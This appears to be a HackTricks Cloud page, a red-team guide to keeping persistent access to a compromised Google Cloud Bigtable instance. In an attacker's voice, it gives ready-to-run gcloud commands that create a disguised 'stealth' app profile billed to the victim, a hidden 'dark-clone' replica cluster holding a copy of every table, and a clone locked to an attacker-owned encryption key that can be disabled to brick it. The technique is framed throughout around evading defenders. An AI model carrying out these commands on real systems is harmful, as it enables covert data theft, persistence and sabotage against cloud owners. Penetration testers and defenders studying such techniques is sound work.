GCP - Bigtable Persistence

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Bigtable

For more information about Bigtable check:

GCP - Bigtable Enum

Dedicated attacker App Profile

Permissions: bigtable.appProfiles.create, bigtable.appProfiles.update.

Create an app profile that routes traffic to your replica cluster and enable Data Boost so you never depend on provisioned nodes that defenders might notice.

Create stealth app profile

gcloud bigtable app-profiles create stealth-profile \
  --instance=<instance-id> --route-any --restrict-to=<attacker-cluster> \
  --row-affinity --description="internal batch"

gcloud bigtable app-profiles update stealth-profile \
  --instance=<instance-id> --data-boost \
  --data-boost-compute-billing-owner=HOST_PAYS

As long as this profile exists you can reconnect using fresh credentials that reference it.

Maintain your own replica cluster

Permissions: bigtable.clusters.create, bigtable.instances.update, bigtable.clusters.list.

Provision a minimal node-count cluster in a quiet region. Even if your client identities disappear, the cluster keeps a full copy of every table until defenders explicitly remove it.

Create replica cluster

gcloud bigtable clusters create dark-clone \
  --instance=<instance-id> --zone=us-west4-b --num-nodes=1

Keep an eye on it through gcloud bigtable clusters describe dark-clone --instance=<instance-id> so you can scale up instantly when you need to pull data.

Lock replication behind your own CMEK

Permissions: bigtable.clusters.create, cloudkms.cryptoKeyVersions.useToEncrypt on the attacker-owned key.

Bring your own KMS key when spinning up a clone. Without that key, Google cannot re-create or fail over the cluster, so blue teams must coordinate with you before touching it.

Create CMEK-protected cluster

gcloud bigtable clusters create cmek-clone \
  --instance=<instance-id> --zone=us-east4-b --num-nodes=1 \
  --kms-key=projects/<attacker-proj>/locations/<kms-location>/keyRings/<ring>/cryptoKeys/<key>

Rotate or disable the key in your project to instantly brick the replica (while still letting you turn it back on later).

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.